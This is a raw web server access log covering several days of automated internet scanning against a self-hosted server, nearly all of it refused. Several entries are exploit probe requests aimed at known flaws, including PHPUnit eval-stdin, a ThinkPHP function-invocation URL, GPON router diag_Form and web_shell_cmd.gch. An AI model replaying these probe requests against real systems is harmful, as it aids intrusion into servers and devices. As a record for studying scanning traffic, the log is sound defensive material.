"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:22:55 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:22:56 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:22:58 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:22:59 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [19/Aug/2021:15:23:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:23:01 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:15:23:02 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Aug/2021:16:21:54 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:16:21:55 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:16:56:54 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.206.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Aug/2021:17:09:30 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.186] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Aug/2021:17:22:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.198.224] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Aug/2021:17:42:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 121.46.25.189] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-" [19/Aug/2021:17:42:25 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 252] [Gzip -] "-" "-" [19/Aug/2021:17:42:58 +0000] 400 - GET http 64.22.31.253 "/console/login/LoginForm.jsp" [Client 121.46.25.189] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-" [19/Aug/2021:17:43:11 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 252] [Gzip -] "-" "-" [19/Aug/2021:17:43:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 121.46.25.189] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-" [19/Aug/2021:17:43:53 +0000] 444 - GET https 64.22.31.253 "/console/login/LoginForm.jsp" [Client 121.46.25.189] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-" [19/Aug/2021:18:51:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Aug/2021:18:55:11 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.204.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Aug/2021:20:40:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 199.195.251.84] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [19/Aug/2021:20:40:27 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Aug/2021:20:40:27 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Aug/2021:20:40:27 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Aug/2021:20:40:27 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Aug/2021:20:40:27 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Aug/2021:20:40:27 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Aug/2021:20:40:37 +0000] 400 - - https localhost "-" [Client 23.129.64.164] [Length 154] [Gzip -] "-" "-" [19/Aug/2021:20:40:44 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 45.129.56.200] [Length 0] [Gzip -] "-" "-" [19/Aug/2021:20:40:46 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.133] [Length 0] [Gzip -] "-" "-" [19/Aug/2021:21:08:34 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [19/Aug/2021:23:06:03 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:23:06:03 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Aug/2021:23:10:07 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.239] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:00:21:56 +0000] 400 - GET http 64.22.31.253 "/" [Client 192.241.197.60] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:02:27:23 +0000] 400 - GET http 64.22.31.253 "/login" [Client 121.46.25.189] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-" [20/Aug/2021:02:27:24 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 252] [Gzip -] "-" "-" [20/Aug/2021:02:29:07 +0000] 444 - GET https 64.22.31.253 "/login" [Client 121.46.25.189] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-" [20/Aug/2021:02:29:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 121.46.25.189] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-" [20/Aug/2021:02:31:01 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:02:31:02 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:03:08:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.206.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:03:53:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.175.213.154] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [20/Aug/2021:04:38:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [20/Aug/2021:05:30:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [20/Aug/2021:05:45:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Aug/2021:06:34:06 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [20/Aug/2021:06:41:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [20/Aug/2021:06:50:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:07:11:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.168.143] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [20/Aug/2021:07:33:37 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/api/tokens" [Client 209.141.53.116] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [20/Aug/2021:07:33:37 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/guacamole/api/tokens" [Client 209.141.53.116] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [20/Aug/2021:07:36:27 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:07:36:28 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:07:44:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.148.145.28] [Length 0] [Gzip -] "libwww-perl/6.54" "-" [20/Aug/2021:07:50:53 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [20/Aug/2021:09:00:17 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:09:00:18 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:09:53:25 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [20/Aug/2021:10:22:20 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:10:38:23 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:10:38:23 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:11:13:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.148.145.28] [Length 0] [Gzip -] "libwww-perl/6.54" "-" [20/Aug/2021:11:15:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.55.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [20/Aug/2021:11:15:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 193.118.55.162] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [20/Aug/2021:11:43:07 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:11:43:08 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:12:12:14 +0000] 444 - POST https 64.22.31.253 "/web_shell_cmd.gch" [Client 209.141.56.88] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [20/Aug/2021:12:12:15 +0000] 444 - POST https 64.22.31.253 "/web_shell_cmd.gch" [Client 209.141.56.88] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [20/Aug/2021:12:12:15 +0000] 444 - POST https 64.22.31.253 "/web_shell_cmd.gch" [Client 209.141.56.88] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [20/Aug/2021:14:12:38 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:14:12:39 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:14:29:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Aug/2021:15:35:14 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:14 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:15 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:17 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:19 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:21 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [20/Aug/2021:15:35:22 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:23 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:35:24 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Aug/2021:15:42:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.44] [Length 0] [Gzip -] "-" "-" [20/Aug/2021:15:42:55 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "-" "-" [20/Aug/2021:15:42:56 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [20/Aug/2021:16:51:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Aug/2021:16:58:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.202.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:17:11:41 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.17] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:17:23:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.146] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:17:34:28 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:17:34:28 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:18:53:50 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.196.86] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:20:06:54 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:20:06:54 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:20:44:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Aug/2021:20:44:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Aug/2021:20:44:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Aug/2021:20:44:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Aug/2021:20:44:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Aug/2021:20:44:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Aug/2021:20:47:37 +0000] 444 - GET https opds.moralanimal.net "/" [Client 61.135.15.158] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; HUAWEI P20 Build/23112) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4472.114 Mobile Safari/537.36 Edg/86" "-" [20/Aug/2021:21:11:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.62.229.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [20/Aug/2021:21:11:32 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 178.62.229.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [20/Aug/2021:21:11:38 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 178.62.229.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [20/Aug/2021:21:54:42 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:21:54:42 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Aug/2021:23:10:28 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.199.14] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Aug/2021:23:27:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.154.255.147] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [20/Aug/2021:23:27:49 +0000] 444 - OPTIONS https localhost "/" [Client 45.154.255.147] [Length 0] [Gzip -] "-" "-" [20/Aug/2021:23:27:53 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.160] [Length 0] [Gzip -] "-" "-" [20/Aug/2021:23:27:56 +0000] 400 - - https localhost "-" [Client 23.129.64.160] [Length 154] [Gzip -] "-" "-" [21/Aug/2021:01:47:14 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Aug/2021:01:47:15 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Aug/2021:01:52:37 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Aug/2021:01:52:38 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [21/Aug/2021:02:04:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [21/Aug/2021:03:11:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.173] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Aug/2021:03:17:57 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36" "-" [21/Aug/2021:03:18:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 